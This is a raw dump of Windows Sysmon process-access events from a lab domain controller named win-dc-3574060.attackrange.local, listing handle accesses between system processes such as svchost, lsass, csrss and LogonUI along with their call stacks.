08:41:06.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000967Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000966Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000965Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000964Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000963Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000962Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000961Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.465{5D479F2C-169F-5F84-0A00-000000007F01}8561132C:\Windows\system32\services.exe{5D479F2C-16A2-5F84-2000-000000007F01}2376C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000960Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.449{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16A2-5F84-2000-000000007F01}2376C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000959Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.449{5D479F2C-169F-5F84-0A00-000000007F01}8561264C:\Windows\system32\services.exe{5D479F2C-16A2-5F84-2000-000000007F01}2376C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000958Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.449{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000957Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.449{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000956Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.449{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000955Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.340{5D479F2C-16A1-5F84-1200-000000007F01}12081088C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6a54|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000954Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.340{5D479F2C-16A1-5F84-1200-000000007F01}12081088C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6a54|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000953Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.340{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16A2-5F84-1F00-000000007F01}2304C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000952Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.340{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16A2-5F84-1E00-000000007F01}2284C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000951Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.340{5D479F2C-16A1-5F84-1000-000000007F01}11442196C:\Windows\system32\svchost.exe{5D479F2C-16A2-5F84-1E00-000000007F01}2284C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+64ed5|C:\Windows\SYSTEM32\ntdll.dll+64bdd|C:\Windows\SYSTEM32\ntdll.dll+64a40|C:\Windows\SYSTEM32\ntdll.dll+45b70|C:\Windows\SYSTEM32\ntdll.dll+2a073|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000950Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.340{5D479F2C-16A1-5F84-1000-000000007F01}11441872C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000949Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000948Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000947Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.309{5D479F2C-16A1-5F84-1200-000000007F01}12081088C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6a54|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000946Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.309{5D479F2C-16A1-5F84-1200-000000007F01}12081088C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6a54|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000945Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.309{5D479F2C-16A1-5F84-1200-000000007F01}12081088C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6a54|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000944Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.262{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000943Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.262{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000942Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.246{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exeC:\Windows\System32\wbem\Repository\WRITABLE.TST2020-10-12 08:41:06.246 10341000x8000000000000000941Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.199{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2228C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000940Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.199{5D479F2C-16A1-5F84-1000-000000007F01}11441872C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2228C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+64ed5|C:\Windows\SYSTEM32\ntdll.dll+64bdd|C:\Windows\SYSTEM32\ntdll.dll+64a40|C:\Windows\SYSTEM32\ntdll.dll+45b70|C:\Windows\SYSTEM32\ntdll.dll+2a073|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000939Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.199{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2220C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000938Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 